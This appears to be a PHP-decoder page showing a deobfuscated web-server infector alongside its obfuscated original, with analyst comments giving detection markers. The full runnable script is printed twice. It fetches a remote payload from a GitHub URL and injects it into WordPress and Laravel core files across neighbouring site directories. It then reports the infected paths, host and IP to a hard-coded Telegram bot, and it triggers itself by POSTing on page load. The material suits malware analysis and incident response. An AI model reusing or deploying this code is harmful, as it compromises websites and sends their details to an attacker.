
PHP Decode

<?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { $payloadUrl = "\150\x74\x74\160..

Decoded Output

<?php 
 
// Analyst note: everything inside this branch runs only for a POST request.
// The <script> at the end of this file issues that POST to the page's own URL
// when the page is loaded in a browser.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Remote location of the content that is later appended to the targeted
    // files (network indicator for egress logs and proxy rules).
    $payloadUrl = "https://raw.githubusercontent.com/necessaryfor/neces/refs/heads/main/z2.txt";

    // Set from the `logke` query parameter; never read again in this listing.
    $logMode = isset($_GET['logke']);
    // Outbound fetch through the URL wrapper of file_get_contents(); this only
    // works where allow_url_fopen is enabled and egress to the host is permitted.
    $payload = file_get_contents($payloadUrl);
    if (!$payload) {
        // Runtime message is Turkish: "Payload could not be downloaded."
        echo json_encode(['status' => 'error', 'message' => 'Payload indirilemedi.']);
        exit();
    }
 
    /**
     * Analyst note: walks upward from $startDir until the path equals '/', and at
     * every level collects each subdirectory whose name consists only of
     * letters, digits, '-' and '.'.
     *
     * The function name suggests these are meant to be per-domain directories,
     * but the pattern accepts any directory with such a name, so the result
     * includes siblings of every ancestor of the starting directory.
     * Per-site filesystem isolation (separate OS users, open_basedir) limits
     * what this walk can enumerate.
     *
     * @param string $startDir Directory to start from (the caller passes __DIR__).
     * @return array De-duplicated list of matching directory paths.
     */
    function findDomains_v1($startDir)
    {
        $currentDir = realpath($startDir);
        $domains = [];

        // Climb one directory per iteration until the root is reached.
        while ($currentDir !== '/') {
            $entries = scandir($currentDir);

            foreach ($entries as $entry) {
                if ($entry === '.' || $entry === '..') {
                    continue;
                }

                $entryPath = $currentDir . DIRECTORY_SEPARATOR . $entry;

                // Keep directories only, filtered by the name pattern.
                if (is_dir($entryPath) && preg_match('/^[a-zA-Z0-9\-.]+$/', $entry)) {
                    $domains[] = $entryPath;
                }
            }

            $currentDir = dirname($currentDir);
        }

        return array_unique($domains);
    }
 
    /**
     * Analyst note: runs scanAndProcess() on every directory in $domains and
     * concatenates the per-file result records.
     *
     * @param array  $domains      Directory paths to scan.
     * @param string $payload      Content handed down to the file-modification step.
     * @param array  $targetFiles  Relative path suffixes to look for.
     * @param array  $updatedFiles Passed by reference; collects paths that were rewritten.
     * @return array Result records of the form ['file' => ..., 'status' => ..., 'message' => ...].
     */
    function scanAndProcessInDomains($domains, $payload, $targetFiles, &$updatedFiles)
    {
        $results = [];
        foreach ($domains as $domainDir) {
            $results = array_merge($results, scanAndProcess($domainDir, $payload, $targetFiles, $updatedFiles));
        }
        return $results;
    }
 
    /**
     * Analyst note: builds the new contents for a targeted file. The host file's
     * PHP tags are adjusted, then a marker comment and the downloaded payload
     * are appended after two newlines.
     *
     * The literal marker "<!-- Miusk Code: <UTC timestamp> -->" is a stable
     * string to search for when triaging a web root for modified files.
     *
     * @param string $fileContents Current contents of the host file.
     * @param string $payload      Downloaded content to append.
     * @return string Contents to be written back to the host file.
     */
    function adjustPhpTags($fileContents, $payload)
    {
        $utcTimestamp = gmdate('Y-m-d H:i:s');
        // Marker carrying the UTC time of the write, followed by the payload.
        $MiuskCode = "<!-- Miusk Code: $utcTimestamp -->
$payload";

        if (preg_match('/<\?php/', $fileContents)) {
            // An opening tag exists but the file does not end with a closing
            // tag (optionally followed by whitespace): append one.
            if (!preg_match('/\?>\s*$/', $fileContents)) {
                $fileContents .= "
?>";
            }
        } else {
            // No opening tag anywhere in the file: prepend one.
            $fileContents = "<?php
" . $fileContents;
        }

        return $fileContents . "

" . $MiuskCode;
    }
 
    /**
     * Analyst note: reports the list of rewritten files, the request's Host
     * header and that host's first DNS A record to a Telegram chat through the
     * Bot API.
     *
     * The hard-coded bot token and chat id are indicators tied to the operator.
     * An outbound request from the web server process to api.telegram.org is a
     * useful detection and egress-filtering point.
     *
     * @param array $updatedFiles Paths of the files that were rewritten.
     * @return void
     */
    function sendTelegramNotification($updatedFiles)
{
    $botToken = "7288530056:AAH3mvjU3wl94AivFXbX2XWH4Oug6c74gy8";
    $chatId = "-1002316636347";

    $processedPaths = [];

    foreach ($updatedFiles as $filePath) {
        // Insert a space between the domain-like part and the following '/'
        $formattedPath = preg_replace('/(\.[a-z]{2,})(\/)/', '$1 $2', $filePath);
        $processedPaths[] = $formattedPath; // add the processed path to the array
    }

    // Filter out repeated paths
    $uniquePaths = array_unique($processedPaths);

    // Runtime text below is Turkish ("Updated files:"); it is part of the message
    // and therefore left untouched.
    $message = "Gncellenen dosyalar:
";
    foreach ($uniquePaths as $uniquePath) {
        $message .= "- $uniquePath
";
    }

    $host = $_SERVER['HTTP_HOST'];  // Host header taken as-is from the request
    $message .= "Sayfa URL: " . $host . "
";

    // Resolve the host to an IP address with a DNS A-record query
    $dnsRecords = dns_get_record($host, DNS_A);
    $ip = isset($dnsRecords[0]['ip']) ? $dnsRecords[0]['ip'] : 'IP bulunamad';

    $message .= "domain-ip: " . $ip . "
";

    // Send the Telegram message (GET request to the Bot API sendMessage method)
    $message = urlencode($message);
    file_get_contents("https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=$message");
}
 
 
    /**
     * Analyst note: recursively walks $directory. For every regular file it
     * compares the file name and the trailing directory components of its path
     * against each entry of $targetFiles, and hands files that satisfy the
     * comparison to processFile().
     *
     * @param string $directory    Directory to walk.
     * @param string $payload      Content handed down to processFile().
     * @param array  $targetFiles  Relative path suffixes, '/'-separated.
     * @param array  $updatedFiles Passed by reference; collects paths that were rewritten.
     * @return array Result records for this subtree.
     */
    function scanAndProcess($directory, $payload, $targetFiles, &$updatedFiles)
    {
        $files = scandir($directory);
        $results = [];

        foreach ($files as $file) {
            if ($file === '.' || $file === '..') {
                continue;
            }

            $filePath = $directory . DIRECTORY_SEPARATOR . $file;

            try {
                if (is_dir($filePath)) {
                    // Recurse into subdirectories.
                    $results = array_merge($results, scanAndProcess($filePath, $payload, $targetFiles, $updatedFiles));
                } else {
                    // Check based on the parent folder names
                    $fileName = basename($filePath);
                    $parentDirs = array_filter(explode(DIRECTORY_SEPARATOR, dirname($filePath)));

                    foreach ($targetFiles as $target) {
                        // Split the target into its file name and parent directories
                        $targetParts = array_filter(explode('/', $target));
                        $targetFileName = array_pop($targetParts); // last element is the file name
                        $targetParentDirs = $targetParts; // the rest are parent directory names

                        // If the file name matches, check the parent directories
                        if ($fileName === $targetFileName) {
                            // Order matters: the trailing components of the file's directory
                            // path are compared with the target's parent directories
                            if (count($targetParentDirs) <= count($parentDirs) && array_slice($parentDirs, -count($targetParentDirs)) === $targetParentDirs) {
                                processFile($filePath, $payload, $updatedFiles, $results);
                            }
                        }
                    }
                }
            } catch (Exception $e) {
                // Exceptions are recorded in the result list; the walk continues.
                $results[] = ['file' => $filePath, 'status' => 'error', 'message' => $e->getMessage()];
            }
        }
        return $results;
    }
 
    /**
     * Analyst note: rewrites one host file in place. If the file already carries
     * the "Miusk Code" marker and its timestamp is less than 30 seconds old, the
     * file is skipped; otherwise everything from the marker to the end of the
     * file is removed and a fresh marker plus payload is appended, so a file
     * is re-written on later runs rather than left alone.
     *
     * Both the read and the write suppress PHP warnings with '@'. Making the
     * targeted files non-writable for the web server user and monitoring them
     * for integrity changes addresses the write performed here.
     *
     * @param string $filePath     File to rewrite.
     * @param string $payload      Content to append.
     * @param array  $updatedFiles Passed by reference; receives $filePath on a successful write.
     * @param array  $results      Passed by reference; receives one result record.
     * @return void
     */
    function processFile($filePath, $payload, &$updatedFiles, &$results)
    {
        $fileContents = @file_get_contents($filePath);

        if ($fileContents === false) {
            // Runtime message is Turkish: "File could not be read."
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Dosya okunamad.'];
            return;
        }

        // A marker from an earlier run is present.
        if (preg_match('/<!-- Miusk Code: (.*?) -->/', $fileContents, $matches)) {
            $lastUpdate = strtotime($matches[1]);
            $currentUtc = time();

            // Written less than 30 seconds ago: leave the file as it is.
            if (($currentUtc - $lastUpdate) < 30) {
                $results[] = ['file' => $filePath, 'status' => 'skipped', 'message' => 'Kod zaten gncel.'];
                return;
            }

            // Drop the previous marker and everything after it before re-appending.
            $fileContents = preg_replace('/

<!-- Miusk Code.*$/s', '', $fileContents);
        }

        $adjustedContents = adjustPhpTags($fileContents, $payload);
        if (@file_put_contents($filePath, $adjustedContents)) {
            $updatedFiles[] = $filePath;
            $results[] = ['file' => $filePath, 'status' => 'success', 'message' => 'Kod baaryla eklendi.'];
        } else {
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Kod eklenemedi.'];
        }
    }
 
    // Analyst note: driver. Starts from the directory this script sits in.
    $startDir = __DIR__;
    // Path suffixes searched for: a Laravel HTTP kernel and two WordPress
    // bootstrap/configuration files. These are the files to check first
    // for the "Miusk Code" marker during incident response.
    $targetFiles = ['app/Http/Kernel.php', 'wp-load.php', 'wp-config.php'];
    $domains = findDomains_v1($startDir);

    $updatedFiles = [];
    $results = scanAndProcessInDomains($domains, $payload, $targetFiles, $updatedFiles);

    // Report to the Telegram chat only when at least one file was rewritten.
    if (!empty($updatedFiles)) {
        sendTelegramNotification($updatedFiles);
    }

    // The per-file result list is returned to the caller as JSON.
    echo json_encode($results);
    exit;
}
?> 
 
 
 
 
<script> 
// Analyst note: trigger. When the page is opened with a normal GET, this handler
// sends one POST to the same URL, which is what activates the PHP branch above.
// In access logs this shows up as a GET followed by a POST to the same script.
window.addEventListener('load', function () {
    // Guard so the request is sent once per page load.
    if (!window.started) { 
        window.started = true;

        fetch(window.location.href, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' }
        })
        .then(response => response.json())
        .then(data => {
            data.forEach(result => {
                // statusColor is computed per result but never used, so nothing is rendered.
                const statusColor = result.status === 'success' ? 'green' : result.status === 'error' ? 'red' : 'orange';
            });
        })
        .catch(error => console.error("Hata:", error));
    }
});
</script>


Original Code

<?php

// Analyst note: everything inside this branch runs only for a POST request.
// The <script> at the end of this file issues that POST on page load.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Octal and hex escapes inside a double-quoted string hide the URL from a
    // plain-text search; it decodes to the raw.githubusercontent.com address
    // shown in the decoded listing on this page.
    $payloadUrl = "\150\x74\x74\160\163\x3a\x2f\57\162\141\x77\x2e\147\x69\164\150\165\x62\x75\x73\145\x72\143\x6f\x6e\164\145\156\164\56\x63\x6f\155\x2f\156\x65\x63\145\163\163\x61\162\171\x66\157\162\57\x6e\145\x63\x65\x73\x2f\162\x65\x66\163\57\150\x65\x61\144\x73\x2f\155\141\x69\156\x2f\172\x32\56\164\x78\x74";

    // Set from the `logke` query parameter; never read again in this listing.
    $logMode = isset($_GET['logke']);
    // Outbound fetch through the URL wrapper; requires allow_url_fopen.
    $payload = file_get_contents($payloadUrl);
    if (!$payload) {
        // Runtime message is Turkish: "Payload could not be downloaded."
        echo json_encode(['status' => 'error', 'message' => 'Payload indirilemedi.']);
        exit();
    }

    /**
     * Analyst note: climbs from $startDir to '/', collecting at each level every
     * subdirectory whose name is made up only of letters, digits, '-' and '.'.
     * The pattern is not specific to domain names, so siblings of every
     * ancestor directory are included. Filesystem isolation between sites
     * (separate OS users, open_basedir) restricts what can be listed here.
     *
     * @param string $startDir Directory to start from (the caller passes __DIR__).
     * @return array De-duplicated list of matching directory paths.
     */
    function findDomains_v1($startDir)
    {
        $currentDir = realpath($startDir);
        $domains = [];

        // One level up per iteration until the root is reached.
        while ($currentDir !== '/') {
            $entries = scandir($currentDir);

            foreach ($entries as $entry) {
                if ($entry === '.' || $entry === '..') {
                    continue;
                }

                $entryPath = $currentDir . DIRECTORY_SEPARATOR . $entry;

                // Directories only, filtered by the name pattern.
                if (is_dir($entryPath) && preg_match('/^[a-zA-Z0-9\-.]+$/', $entry)) {
                    $domains[] = $entryPath;
                }
            }

            $currentDir = dirname($currentDir);
        }

        return array_unique($domains);
    }

    /**
     * Analyst note: applies scanAndProcess() to each directory in $domains and
     * merges the result records into one list.
     *
     * @param array  $domains      Directory paths to scan.
     * @param string $payload      Content handed down to the file-modification step.
     * @param array  $targetFiles  Relative path suffixes to look for.
     * @param array  $updatedFiles Passed by reference; collects paths that were rewritten.
     * @return array Merged result records.
     */
    function scanAndProcessInDomains($domains, $payload, $targetFiles, &$updatedFiles)
    {
        $results = [];
        foreach ($domains as $domainDir) {
            $results = array_merge($results, scanAndProcess($domainDir, $payload, $targetFiles, $updatedFiles));
        }
        return $results;
    }

    /**
     * Analyst note: produces the contents written back to a targeted file: the
     * host file with its PHP tags adjusted, then two newlines, the marker
     * "<!-- Miusk Code: <UTC timestamp> -->", a newline and the payload.
     * The marker text is a stable search string for finding modified files.
     *
     * @param string $fileContents Current contents of the host file.
     * @param string $payload      Downloaded content to append.
     * @return string Contents to be written back.
     */
    function adjustPhpTags($fileContents, $payload)
    {
        $utcTimestamp = gmdate('Y-m-d H:i:s');
        // Marker with the UTC time of the write, followed by the payload.
        $MiuskCode = "<!-- Miusk Code: $utcTimestamp -->\n$payload";

        if (preg_match('/<\?php/', $fileContents)) {
            // Opening tag present but no closing tag at the end: append one.
            if (!preg_match('/\?>\s*$/', $fileContents)) {
                $fileContents .= "\n?>";
            }
        } else {
            // No opening tag anywhere in the file: prepend one.
            $fileContents = "<?php\n" . $fileContents;
        }

        return $fileContents . "\n\n" . $MiuskCode;
    }

    /**
     * Analyst note: sends the list of rewritten files, the request's Host header
     * and that host's first DNS A record to a Telegram chat via the Bot API.
     * The bot token and chat id are stored as octal/hex-escaped strings; their
     * plain values appear in the decoded listing on this page and serve as
     * operator indicators. Outbound traffic from the web server process to
     * api.telegram.org is a practical detection point.
     *
     * @param array $updatedFiles Paths of the files that were rewritten.
     * @return void
     */
    function sendTelegramNotification($updatedFiles)
{
    $botToken = "\x37\x32\70\x38\x35\x33\60\x30\x35\x36\x3a\101\x41\110\x33\x6d\166\x6a\125\x33\167\x6c\x39\64\x41\151\166\106\130\x62\130\62\130\127\110\x34\x4f\165\x67\x36\x63\x37\64\x67\171\x38";
    $chatId = "\55\x31\x30\60\62\x33\x31\x36\x36\x33\66\63\x34\x37";

    $processedPaths = [];

    foreach ($updatedFiles as $filePath) {
        // Insert a space between the domain-like part and the following '/'
        $formattedPath = preg_replace('/(\.[a-z]{2,})(\/)/', '$1 $2', $filePath);
        $processedPaths[] = $formattedPath; // add the processed path to the array
    }

    // Filter out repeated paths
    $uniquePaths = array_unique($processedPaths);

    // Runtime text is Turkish ("Updated files:") and is left untouched.
    $message = "Gncellenen dosyalar:\n";
    foreach ($uniquePaths as $uniquePath) {
        $message .= "- $uniquePath\n";
    }

    $host = $_SERVER['HTTP_HOST'];  // Host header taken as-is from the request
    $message .= "Sayfa URL: " . $host . "\n";

    // Resolve the host to an IP address with a DNS A-record query
    $dnsRecords = dns_get_record($host, DNS_A);
    $ip = isset($dnsRecords[0]['ip']) ? $dnsRecords[0]['ip'] : 'IP bulunamad';

    $message .= "domain-ip: " . $ip . "\n";

    // Send the Telegram message (GET request to the Bot API sendMessage method)
    $message = urlencode($message);
    file_get_contents("https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=$message");
}


    /**
     * Analyst note: recursive directory walk. Each regular file's name and the
     * trailing components of its directory path are compared with every entry
     * of $targetFiles; files satisfying the comparison go to processFile().
     *
     * @param string $directory    Directory to walk.
     * @param string $payload      Content handed down to processFile().
     * @param array  $targetFiles  Relative path suffixes, '/'-separated.
     * @param array  $updatedFiles Passed by reference; collects paths that were rewritten.
     * @return array Result records for this subtree.
     */
    function scanAndProcess($directory, $payload, $targetFiles, &$updatedFiles)
    {
        $files = scandir($directory);
        $results = [];

        foreach ($files as $file) {
            if ($file === '.' || $file === '..') {
                continue;
            }

            $filePath = $directory . DIRECTORY_SEPARATOR . $file;

            try {
                if (is_dir($filePath)) {
                    // Recurse into subdirectories.
                    $results = array_merge($results, scanAndProcess($filePath, $payload, $targetFiles, $updatedFiles));
                } else {
                    // Check based on the parent folder names
                    $fileName = basename($filePath);
                    $parentDirs = array_filter(explode(DIRECTORY_SEPARATOR, dirname($filePath)));

                    foreach ($targetFiles as $target) {
                        // Split the target into its file name and parent directories
                        $targetParts = array_filter(explode('/', $target));
                        $targetFileName = array_pop($targetParts); // last element is the file name
                        $targetParentDirs = $targetParts; // the rest are parent directory names

                        // If the file name matches, check the parent directories
                        if ($fileName === $targetFileName) {
                            // Order matters: the trailing components of the file's directory
                            // path are compared with the target's parent directories
                            if (count($targetParentDirs) <= count($parentDirs) && array_slice($parentDirs, -count($targetParentDirs)) === $targetParentDirs) {
                                processFile($filePath, $payload, $updatedFiles, $results);
                            }
                        }
                    }
                }
            } catch (Exception $e) {
                // Exceptions are recorded in the result list; the walk continues.
                $results[] = ['file' => $filePath, 'status' => 'error', 'message' => $e->getMessage()];
            }
        }
        return $results;
    }

    /**
     * Analyst note: in-place rewrite of one host file. A file whose existing
     * "Miusk Code" marker is less than 30 seconds old is skipped; otherwise the
     * old marker and everything after it are stripped and a fresh marker plus
     * payload is appended. Read and write both suppress warnings with '@'.
     * Denying the web server user write access to the targeted files and
     * monitoring them for integrity changes addresses the write done here.
     *
     * @param string $filePath     File to rewrite.
     * @param string $payload      Content to append.
     * @param array  $updatedFiles Passed by reference; receives $filePath on a successful write.
     * @param array  $results      Passed by reference; receives one result record.
     * @return void
     */
    function processFile($filePath, $payload, &$updatedFiles, &$results)
    {
        $fileContents = @file_get_contents($filePath);

        if ($fileContents === false) {
            // Runtime message is Turkish: "File could not be read."
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Dosya okunamad.'];
            return;
        }

        // A marker from an earlier run is present.
        if (preg_match('/<!-- Miusk Code: (.*?) -->/', $fileContents, $matches)) {
            $lastUpdate = strtotime($matches[1]);
            $currentUtc = time();

            // Written less than 30 seconds ago: leave the file as it is.
            if (($currentUtc - $lastUpdate) < 30) {
                $results[] = ['file' => $filePath, 'status' => 'skipped', 'message' => 'Kod zaten gncel.'];
                return;
            }

            // Drop the previous marker and everything after it before re-appending.
            $fileContents = preg_replace('/\n\n<!-- Miusk Code.*$/s', '', $fileContents);
        }

        $adjustedContents = adjustPhpTags($fileContents, $payload);
        if (@file_put_contents($filePath, $adjustedContents)) {
            $updatedFiles[] = $filePath;
            $results[] = ['file' => $filePath, 'status' => 'success', 'message' => 'Kod baaryla eklendi.'];
        } else {
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Kod eklenemedi.'];
        }
    }

    // Analyst note: driver. Starts from the directory this script sits in.
    $startDir = __DIR__;
    // Path suffixes searched for: a Laravel HTTP kernel and two WordPress
    // bootstrap/configuration files. Check these first for the "Miusk Code"
    // marker when triaging a host.
    $targetFiles = ['app/Http/Kernel.php', 'wp-load.php', 'wp-config.php'];
    $domains = findDomains_v1($startDir);

    $updatedFiles = [];
    $results = scanAndProcessInDomains($domains, $payload, $targetFiles, $updatedFiles);

    // Report to the Telegram chat only when at least one file was rewritten.
    if (!empty($updatedFiles)) {
        sendTelegramNotification($updatedFiles);
    }

    // The per-file result list is returned to the caller as JSON.
    echo json_encode($results);
    exit;
}
?>




<script>
// Analyst note: trigger. A normal GET of this page makes the browser send one
// POST to the same URL, which activates the PHP branch above. Access logs show
// a GET followed by a POST to the same script path.
window.addEventListener('load', function () {
    // Guard so the request is sent once per page load.
    if (!window.started) { 
        window.started = true;

        fetch(window.location.href, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' }
        })
        .then(response => response.json())
        .then(data => {
            data.forEach(result => {
                // statusColor is computed per result but never used, so nothing is rendered.
                const statusColor = result.status === 'success' ? 'green' : result.status === 'error' ? 'red' : 'orange';
            });
        })
        .catch(error => console.error("Hata:", error));
    }
});
</script>

Function Calls

None

Variables

None

Stats

MD5 a5325a432329aff6899c27101f4aa431
Eval Count 0
Decode Time 74 ms